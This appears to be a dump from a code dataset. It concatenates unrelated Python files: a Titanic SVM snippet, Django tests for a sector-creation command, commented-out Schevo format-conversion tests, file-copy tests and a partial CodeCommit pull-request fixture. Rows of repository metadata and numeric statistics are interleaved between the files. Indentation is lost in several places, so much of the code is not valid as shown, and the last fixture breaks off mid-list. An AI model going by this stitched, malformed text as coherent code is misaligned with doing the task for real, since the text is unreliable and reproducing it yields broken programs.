def ga_svm():
test_df = get_testing_data()
ids = test_df.PassengerId.values
ga = SVMFeatureSelector()
features = ga.calculate()
print "SVM features:"
print features
test_data = ga.massage_data_without_outputs(test_df, features)
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_data = ga.massage_data_with_outputs(train_df, features)
expected_eval_outputs = eval_df.Survived.values
eval_data = ga.massage_data_with_outputs(eval_df, features)
no_of_inputs = features.count(1)
clf = svm.SVC()
clf = clf.fit(train_data, expected_training_outputs)
evaluation = clf.predict(eval_data)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = clf.predict(test_data)
write_results("ga_rfc.csv", ids, output)
return f_scores
| 29.154728 | 78 | 0.604324 | 1,218 | 10,175 | 4.744663 | 0.086207 | 0.030109 | 0.021803 | 0.033224 | 0.818308 | 0.818308 | 0.807752 | 0.798062 | 0.780931 | 0.780931 | 0 | 0.010415 | 0.30172 | 10,175 | 348 | 79 | 29.238506 | 0.802956 | 0.001769 | 0 | 0.798354 | 0 | 0 | 0.047366 | 0.002265 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.078189 | 0.041152 | null | null | 0.024691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
8e5bbf568303ea7b7dcb1dac7fd1c56008dab0c8 | 13,236 | py | Python | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 6 | 2019-12-02T16:11:24.000Z | 2022-03-18T10:02:02.000Z | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 1,696 | 2019-10-31T14:08:37.000Z | 2022-03-29T12:35:57.000Z | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 9 | 2019-11-22T12:42:03.000Z | 2021-09-03T14:25:05.000Z | from io import BytesIO
import factory
import pytest
from django.core.management import call_command
from reversion.models import Version
from datahub.metadata.models import Sector
from datahub.metadata.test.factories import SectorClusterFactory, SectorFactory
pytestmark = pytest.mark.django_db
def test_happy_path(s3_stubber):
"""Test that the command creates the specified records."""
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 3
assert [str(sectors[0].pk), str(sectors[1].pk), str(sectors[2].pk)] == sector_pks
assert [sectors[0].segment, sectors[1].segment, sectors[2].segment] == segments
assert [
sectors[0].sector_cluster,
sectors[1].sector_cluster,
sectors[2].sector_cluster,
] == clusters
assert [
sectors[0].parent,
sectors[1].parent,
sectors[2].parent,
] == [parent_sector, parent_sector, parent_sector]
def test_duplicate_sector(s3_stubber, caplog):
"""Test that the command logs an error when the sector PK already exists."""
caplog.set_level('ERROR')
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
duplicate_sector = SectorFactory(id=sector_pks[2])
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{duplicate_sector.pk},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 3
assert f'Key (id)=({duplicate_sector.pk}) already exists' in caplog.text
assert len(caplog.records) == 1
assert [str(sectors[0].pk), str(sectors[1].pk), str(sectors[2].pk)] == sector_pks
assert [sectors[0].segment, sectors[1].segment] == segments[:2]
assert [sectors[0].sector_cluster, sectors[1].sector_cluster] == clusters[:2]
assert [
sectors[0].parent,
sectors[1].parent,
] == [parent_sector, parent_sector]
def test_blank_parent(s3_stubber):
"""Test that the command creates the specified records when no parent is provided."""
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},{clusters[2].pk},
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 3
assert [str(sectors[0].pk), str(sectors[1].pk), str(sectors[2].pk)] == sector_pks
assert [sectors[0].segment, sectors[1].segment, sectors[2].segment] == segments
assert [
sectors[0].sector_cluster,
sectors[1].sector_cluster,
sectors[2].sector_cluster,
] == clusters
assert [
sectors[0].parent,
sectors[1].parent,
sectors[2].parent,
] == [parent_sector, parent_sector, None]
def test_blank_sector_cluster(s3_stubber):
"""Test that the command creates the specified records when no sector cluster is provided."""
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},,{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 3
assert [str(sectors[0].pk), str(sectors[1].pk), str(sectors[2].pk)] == sector_pks
assert [sectors[0].segment, sectors[1].segment, sectors[2].segment] == segments
assert [sectors[0].sector_cluster, sectors[1].sector_cluster] == clusters[:2]
assert not sectors[2].sector_cluster
assert [
sectors[0].parent,
sectors[1].parent,
sectors[2].parent,
] == [parent_sector, parent_sector, parent_sector]
def test_non_existent_parent(s3_stubber, caplog):
"""Test that the command logs an error when parent PK does not exist."""
caplog.set_level('ERROR')
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},{clusters[2].pk},00000000-0000-0000-0000-000000000000
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 2
assert 'Sector matching query does not exist' in caplog.text
assert len(caplog.records) == 1
assert [str(sectors[0].pk), str(sectors[1].pk)] == sector_pks[:2]
assert [sectors[0].segment, sectors[1].segment] == segments[:2]
assert [sectors[0].sector_cluster, sectors[1].sector_cluster] == clusters[:2]
assert [
sectors[0].parent,
sectors[1].parent,
] == [parent_sector, parent_sector]
def test_non_existent_sector_cluster(s3_stubber, caplog):
"""Test that the command logs an error when sector cluster PK does not exist."""
caplog.set_level('ERROR')
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},00000000-0000-0000-0000-000000000000,{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 2
assert 'SectorCluster matching query does not exist' in caplog.text
assert len(caplog.records) == 1
assert [str(sectors[0].pk), str(sectors[1].pk)] == sector_pks[:2]
assert [sectors[0].segment, sectors[1].segment] == segments[:2]
assert [sectors[0].sector_cluster, sectors[1].sector_cluster] == clusters[:2]
assert [
sectors[0].parent,
sectors[1].parent,
] == [parent_sector, parent_sector]
def test_simulate(s3_stubber):
"""Test that the command simulates creations if --simulate is passed in."""
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key, simulate=True)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert not sectors
def test_audit_log(s3_stubber):
"""Test that reversion revisions are created."""
sector_pks = [
'00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003',
]
segments = ['segment_1', 'segment_2', 'segment_3']
clusters = SectorClusterFactory.create_batch(
3,
name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
)
parent_sector = SectorFactory()
bucket = 'test_bucket'
object_key = 'test_key'
csv_content = f"""id,segment,sector_cluster_id,parent_id
{sector_pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{sector_pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{sector_pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
s3_stubber.add_response(
'get_object',
{
'Body': BytesIO(csv_content.encode(encoding='utf-8')),
},
expected_params={
'Bucket': bucket,
'Key': object_key,
},
)
call_command('create_sector', bucket, object_key)
sectors = Sector.objects.filter(pk__in=sector_pks).order_by('pk')
assert len(sectors) == 3
for sector in sectors:
versions = Version.objects.get_for_object(sector)
assert versions.count() == 1
assert versions[0].revision.get_comment() == 'Sector creation.'
| 32.925373 | 97 | 0.643472 | 1,647 | 13,236 | 4.958106 | 0.074074 | 0.050943 | 0.050943 | 0.063679 | 0.902768 | 0.89493 | 0.891624 | 0.891624 | 0.88893 | 0.88893 | 0 | 0.100672 | 0.201496 | 13,236 | 401 | 98 | 33.007481 | 0.671965 | 0.041251 | 0 | 0.756024 | 0 | 0.006024 | 0.304767 | 0.218673 | 0 | 0 | 0 | 0 | 0.123494 | 1 | 0.024096 | false | 0 | 0.021084 | 0 | 0.045181 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8eada9913902c9988f76b06d8259b0e686d48555 | 7,462 | py | Python | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | 1 | 2020-09-05T00:47:50.000Z | 2020-09-05T00:47:50.000Z | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | null | null | null | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | null | null | null | """Database format conversion tests."""
# Copyright (c) 2001-2009 ElevenCraft Inc.
# See LICENSE for details.
from schevo.backend import backends
from schevo.placeholder import Placeholder
from schevo.test import CreatesSchema
# class TestFormat1Format2ConversionSimple(CreatesSchema):
# """Very simple test of the format 1 to format 2 converter."""
# format = 1
# body = '''
# class Foo(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Foo 1', ),
# (u'Foo 2', ),
# ]
# class Bar(E.Entity):
# id = f.integer()
# foo = f.entity('Foo')
# _key(id)
# _index(foo)
# _sample_unittest = [
# (1, (u'Foo 1', ), ),
# (2, (u'Foo 2', ), ),
# (3, (u'Foo 1', ), ),
# (4, (u'Foo 2', ), ),
# ]
# '''
# def test(self):
# self.internal_structure_format_1(db)
# self.reopen(format=2)
# self.internal_structure_format_2(db)
# def internal_structure_format_1(self, db):
# schevo = db._root['SCHEVO']
# assert schevo['format'] == 1
# extent_name_id = schevo['extent_name_id']
# extents = schevo['extents']
# Foo_extent_id = extent_name_id['Foo']
# Bar_extent_id = extent_name_id['Bar']
# Foo_extent = extents[Foo_extent_id]
# Bar_extent = extents[Bar_extent_id]
# Foo_field_name_id = Foo_extent['field_name_id']
# Bar_field_name_id = Bar_extent['field_name_id']
# Foo_name_field_id = Foo_field_name_id['name']
# Bar_id_field_id = Bar_field_name_id['id']
# Bar_foo_field_id = Bar_field_name_id['foo']
# Foo_entities = Foo_extent['entities']
# Bar_entities = Bar_extent['entities']
# Foo_1 = Foo_entities[1]
# Foo_2 = Foo_entities[2]
# Bar_1 = Bar_entities[1]
# Bar_2 = Bar_entities[2]
# Bar_3 = Bar_entities[3]
# Bar_4 = Bar_entities[4]
# assert Foo_1['fields'][Foo_name_field_id] == u'Foo 1'
# assert Foo_2['fields'][Foo_name_field_id] == u'Foo 2'
# assert Bar_1['fields'][Bar_id_field_id] == 1
# assert Bar_2['fields'][Bar_id_field_id] == 2
# assert Bar_3['fields'][Bar_id_field_id] == 3
# assert Bar_4['fields'][Bar_id_field_id] == 4
# assert Bar_1['fields'][Bar_foo_field_id] == (Foo_extent_id, 1)
# assert Bar_2['fields'][Bar_foo_field_id] == (Foo_extent_id, 2)
# assert Bar_3['fields'][Bar_foo_field_id] == (Foo_extent_id, 1)
# assert Bar_4['fields'][Bar_foo_field_id] == (Foo_extent_id, 2)
# Bar_foo_index_unique, Bar_foo_index_tree = Bar_extent['indices'][
# (Bar_foo_field_id, )]
# assert set(Bar_foo_index_tree.keys()) == set([
# (Foo_extent_id, 1),
# (Foo_extent_id, 2),
# ])
# assert set(Bar_foo_index_tree[(Foo_extent_id, 1)].keys()) == set([1, 3])
# assert set(Bar_foo_index_tree[(Foo_extent_id, 2)].keys()) == set([2, 4])
# def internal_structure_format_2(self, db):
# schevo = db._root['SCHEVO']
# assert schevo['format'] == 2
# extent_name_id = schevo['extent_name_id']
# extents = schevo['extents']
# Foo_extent_id = extent_name_id['Foo']
# Bar_extent_id = extent_name_id['Bar']
# Foo_extent = extents[Foo_extent_id]
# Bar_extent = extents[Bar_extent_id]
# Foo_field_name_id = Foo_extent['field_name_id']
# Bar_field_name_id = Bar_extent['field_name_id']
# Foo_name_field_id = Foo_field_name_id['name']
# Bar_id_field_id = Bar_field_name_id['id']
# Bar_foo_field_id = Bar_field_name_id['foo']
# Foo_entities = Foo_extent['entities']
# Bar_entities = Bar_extent['entities']
# Foo_1 = Foo_entities[1]
# Foo_2 = Foo_entities[2]
# Bar_1 = Bar_entities[1]
# Bar_2 = Bar_entities[2]
# Bar_3 = Bar_entities[3]
# Bar_4 = Bar_entities[4]
# assert Foo_1['fields'][Foo_name_field_id] == u'Foo 1'
# assert Foo_2['fields'][Foo_name_field_id] == u'Foo 2'
# assert Bar_1['fields'][Bar_id_field_id] == 1
# assert Bar_2['fields'][Bar_id_field_id] == 2
# assert Bar_3['fields'][Bar_id_field_id] == 3
# assert Bar_4['fields'][Bar_id_field_id] == 4
# assert Bar_1['fields'][Bar_foo_field_id] == Placeholder(db.Foo[1])
# assert Bar_2['fields'][Bar_foo_field_id] == Placeholder(db.Foo[2])
# assert Bar_3['fields'][Bar_foo_field_id] == Placeholder(db.Foo[1])
# assert Bar_4['fields'][Bar_foo_field_id] == Placeholder(db.Foo[2])
# assert Bar_1['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[1])])
# assert Bar_2['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[2])])
# assert Bar_3['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[1])])
# assert Bar_4['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[2])])
# Bar_foo_index_unique, Bar_foo_index_tree = Bar_extent['indices'][
# (Bar_foo_field_id, )]
# assert set(Bar_foo_index_tree.keys()) == set([
# Placeholder(db.Foo[1]),
# Placeholder(db.Foo[2]),
# ])
# assert set(Bar_foo_index_tree[Placeholder(db.Foo[1])].keys()) == set(
# [1, 3])
# assert set(Bar_foo_index_tree[Placeholder(db.Foo[2])].keys()) == set(
# [2, 4])
# class TestFormat1Format2ConversionComplex(CreatesSchema):
# """More complex test of the format 1 to format 2 converter."""
# format = 1
# body = '''
# class Foo(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Foo 1', ),
# (u'Foo 2', ),
# ]
# class Gee(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Gee 1', ),
# (u'Gee 2', ),
# ]
# class Bar(E.Entity):
# id = f.integer()
# foo = f.entity('Foo')
# gee = f.entity('Gee')
# _key(id)
# _index(foo, gee)
# _sample_unittest = [
# (1, (u'Foo 1', ), (u'Gee 1', ), ),
# (2, (u'Foo 2', ), (u'Gee 1', ), ),
# (3, (u'Foo 1', ), (u'Gee 1', ), ),
# (4, (u'Foo 2', ), (u'Gee 2', ), ),
# ]
# '''
# def test(self):
# self.check_using_public_api()
# self.reopen(format=2)
# self.check_using_public_api()
# def check_using_public_api(self):
# foo1 = db.Foo[1]
# foo2 = db.Foo[2]
# gee1 = db.Gee[1]
# gee2 = db.Gee[2]
# bar1 = db.Bar[1]
# bar2 = db.Bar[2]
# bar3 = db.Bar[3]
# bar4 = db.Bar[4]
# assert bar1.foo == foo1
# assert bar1.gee == gee1
# assert bar2.foo == foo2
# assert bar2.gee == gee1
# assert bar3.foo == foo1
# assert bar3.gee == gee1
# assert bar4.foo == foo2
# assert bar4.gee == gee2
| 35.703349 | 82 | 0.534709 | 961 | 7,462 | 3.816857 | 0.08845 | 0.061069 | 0.047983 | 0.056707 | 0.802345 | 0.74373 | 0.728735 | 0.724918 | 0.724918 | 0.65349 | 0 | 0.0336 | 0.313991 | 7,462 | 208 | 83 | 35.875 | 0.682946 | 0.933262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
d94bae8109474f21f459aa31bb68ed0bd60cb18f | 158 | py | Python | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | 1 | 2022-02-10T16:59:47.000Z | 2022-02-10T16:59:47.000Z | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | null | null | null | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | null | null | null | from uncertainty_eval.metrics.brier import brier_decomposition, brier_score
from uncertainty_eval.metrics.calibration_error import classification_calibration
| 52.666667 | 81 | 0.911392 | 19 | 158 | 7.263158 | 0.578947 | 0.217391 | 0.275362 | 0.376812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056962 | 158 | 2 | 82 | 79 | 0.926175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d94f12fc90ad23c3136b0a878ae4adf6cd9adc80 | 2,780 | py | Python | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | import os
from scripting import cp
def test_cp(tmpdir):
p = tmpdir.mkdir("src").join("hello.txt")
p.write("hello!")
src = os.path.join("src", "hello.txt")
dest = os.path.join("dest", "hi.txt")
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_to_dot(tmpdir):
p = tmpdir.mkdir("src").join("hello.txt")
p.write("hello!")
src = os.path.join("src", "hello.txt")
dest = os.path.join(".", "hi.txt")
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_from_dot(tmpdir):
p = tmpdir.join("hello.txt")
p.write("hello!")
src = os.path.join(".", "hello.txt")
dest = os.path.join("dest", "hi.txt")
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_to_cwd(tmpdir):
p = tmpdir.mkdir("src").join("hello.txt")
p.write("hello!")
src = os.path.join("src", "hello.txt")
dest = "hi.txt"
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_from_cwd(tmpdir):
p = tmpdir.join("hello.txt")
p.write("hello!")
src = "hello.txt"
dest = os.path.join("dest", "hi.txt")
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_from_abspath(tmpdir):
p = tmpdir.join("hello.txt")
p.write("hello!")
with tmpdir.as_cwd():
src = os.path.abspath("hello.txt")
dest = os.path.join("dest", "hi.txt")
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_to_abspath(tmpdir):
p = tmpdir.join("hello.txt")
p.write("hello!")
with tmpdir.as_cwd():
src = "hello.txt"
dest = os.path.abspath(os.path.join("dest", "hi.txt"))
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
def test_cp_with_folders(tmpdir):
p = tmpdir.mkdir("sub").join("hello.txt")
p.write("hello!")
src = os.path.join("sub", "hello.txt")
dest = os.path.join("dest", "sub", "hi.txt")
with tmpdir.as_cwd():
cp(src, dest, create_dirs=True)
with open(dest, "r") as fp:
contents = fp.read()
assert contents == "hello!"
| 23.965517 | 62 | 0.56223 | 401 | 2,780 | 3.802993 | 0.087282 | 0.083934 | 0.078689 | 0.068197 | 0.92918 | 0.92918 | 0.917377 | 0.900328 | 0.900328 | 0.892459 | 0 | 0 | 0.257554 | 2,780 | 115 | 63 | 24.173913 | 0.738857 | 0 | 0 | 0.780488 | 0 | 0 | 0.12554 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.121951 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d955702b3c600270d7d1f124d033dffec2f4843b | 2,788 | py | Python | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | null | null | null | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | 64 | 2022-01-21T20:05:50.000Z | 2022-03-31T03:36:05.000Z | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | null | null | null | COMMIT2 = """commit my-hash-1
Author: John Doe <john@doe.nl>
Date: Fri Jan 21 21:01:00 2022 +0100
feat: my first commit"""
COMMIT1 = """commit my-hash-2
Author: John Doe <john@doe.nl>
Date: Fri Jan 21 21:01:00 2022 +0100
feat: my second commit"""
COMMITS = f"{COMMIT1}\n\n Issue #1\n\n{COMMIT2}\n\n Issue #2"
COMMITS_NO_ISSUES = f"{COMMIT1}\n\n{COMMIT2}"
SCENARIOS = [
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-west-1",
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-central-1",
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS_NO_ISSUES,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-west-1",
"my-other-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS_NO_ISSUES,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-central-1",
"my-other-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::eu-west-1://my-repository",
"eu-central-1",
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::://my-profile@my-repository",
None,
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::://my-repository",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-profile@my-repository",
None,
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-pr-failure",
None,
None,
